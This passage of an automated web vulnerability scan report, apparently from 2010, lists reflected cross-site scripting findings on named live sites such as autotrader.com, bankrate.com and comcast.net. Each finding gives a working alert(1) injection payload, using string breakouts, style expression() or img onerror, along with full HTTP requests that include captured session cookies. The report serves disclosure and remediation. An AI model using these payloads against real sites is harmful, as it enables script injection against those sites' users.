<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/e40a5"-alert(1)-"c1edf7a2e70"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.131. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.autotrader.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19533"%3balert(1)//bdc50d644ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19533";alert(1)//bdc50d644ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?19533"%3balert(1)//bdc50d644ac=1 HTTP/1.1 Host: www.autotrader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html P ...[SNIP]... <script type="text/javascript"> BIRFPageData = { pg_inst:"797433936860309222", logDomain:"http://www.autotrader.com", my:false, params:{ "19533";alert(1)//bdc50d644ac":"1", "disableImpressions":"false" } }; </script> ...[SNIP]...
2.132. http://www.bankrate.com/compare-rates.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bankrate.com
Path:
/compare-rates.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e52be"style="x:expression(alert(1))"0d77ae31848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare-rates.aspx?e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848=1 HTTP/1.1 Host: www.bankrate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Servername: d-brmweb02 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 1.7.0 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=900 Date: Sun, 19 Dec 2010 18:09:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 142628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link type="text/css" ...[SNIP]... <link rel="canonical" href="http://www.bankrate.com/compare-rates.aspx?e52be"style="x:expression(alert(1))"0d77ae31848=1" /> ...[SNIP]...
2.133. http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7dac"style%3d"x%3aexpression(alert(1))"881260241e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7dac"style="x:expression(alert(1))"881260241e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /finance/auto/gas-savers-still-getting-fed-tax-credit.aspx?e7dac"style%3d"x%3aexpression(alert(1))"881260241e5=1 HTTP/1.1 Host: www.bankrate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Servername: d-brmweb02 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 1.7.0 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=900 Date: Sun, 19 Dec 2010 18:09:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link type="text/css" ...[SNIP]... <link rel="canonical" href="http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx?e7dac"style="x:expression(alert(1))"881260241e5=1" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ba35<img%20src%3da%20onerror%3dalert(1)>f7f7658c830 was submitted in the REST URL parameter 2. This input was echoed as 5ba35<img src=a onerror=alert(1)>f7f7658c830 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /articles/entertainment-eonline5ba35<img%20src%3da%20onerror%3dalert(1)>f7f7658c830/20101219/b217076/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:17 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:17 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3514c<img%20src%3da%20onerror%3dalert(1)>4bfe6550562 was submitted in the REST URL parameter 2. This input was echoed as 3514c<img src=a onerror=alert(1)>4bfe6550562 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /articles/entertainment-movies3514c<img%20src%3da%20onerror%3dalert(1)>4bfe6550562/20101217/US.People.Randy.Quaid/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:19 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:19 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 48079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f023<img%20src%3da%20onerror%3dalert(1)>cfb7aba146 was submitted in the REST URL parameter 2. This input was echoed as 7f023<img src=a onerror=alert(1)>cfb7aba146 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /articles/entertainment7f023<img%20src%3da%20onerror%3dalert(1)>cfb7aba146/20090708/entertainment.slideshows.001/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:21 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:21 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c9ac<img%20src%3da%20onerror%3dalert(1)>8179713037 was submitted in the REST URL parameter 2. This input was echoed as 1c9ac<img src=a onerror=alert(1)>8179713037 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /articles/entertainment1c9ac<img%20src%3da%20onerror%3dalert(1)>8179713037/20101219/AS.Fiji.Oprah.Winfrey/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:21 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:21 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47031
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b8ac<img%20src%3da%20onerror%3dalert(1)>b442b71f699 was submitted in the REST URL parameter 2. This input was echoed as 9b8ac<img src=a onerror=alert(1)>b442b71f699 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /articles/sports-boxing9b8ac<img%20src%3da%20onerror%3dalert(1)>b442b71f699/20101219/BOX.Pascal.Hopkins/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:46 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:46 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56495
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f67ef'%3bfefd803c823 was submitted in the REST URL parameter 2. This input was echoed as f67ef';fefd803c823 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/sports-boxingf67ef'%3bfefd803c823/20101219/BOX.Pascal.Hopkins/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:42 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:42 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a02"%3bc6b15b7f637 was submitted in the REST URL parameter 2. This input was echoed as e2a02";c6b15b7f637 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/sports-boxinge2a02"%3bc6b15b7f637/20101219/BOX.Pascal.Hopkins/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:40 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:40 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30dd3"%3b57c65471a56 was submitted in the REST URL parameter 2. This input was echoed as 30dd3";57c65471a56 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/sports-cbk30dd3"%3b57c65471a56/20101218/T25-USC-Kansas/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:44 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:44 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da67d'%3bde5beb5d510 was submitted in the REST URL parameter 2. This input was echoed as da67d';de5beb5d510 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/sports-cbkda67d'%3bde5beb5d510/20101218/T25-USC-Kansas/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:45 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:45 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7d8b0<img%20src%3da%20onerror%3dalert(1)>4a28518cd5 was submitted in the REST URL parameter 2. This input was echoed as 7d8b0<img src=a onerror=alert(1)>4a28518cd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /articles/sports-cbk7d8b0<img%20src%3da%20onerror%3dalert(1)>4a28518cd5/20101218/T25-USC-Kansas/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:50 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72ecb<img%20src%3da%20onerror%3dalert(1)>ee671481b9b was submitted in the REST URL parameter 2. This input was echoed as 72ecb<img src=a onerror=alert(1)>ee671481b9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /articles/sports-mlb72ecb<img%20src%3da%20onerror%3dalert(1)>ee671481b9b/20101219/wise-greinketraded/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:46 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:46 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f8d'%3ba545177219c was submitted in the REST URL parameter 2. This input was echoed as d5f8d';a545177219c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/sports-mlbd5f8d'%3ba545177219c/20101219/wise-greinketraded/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
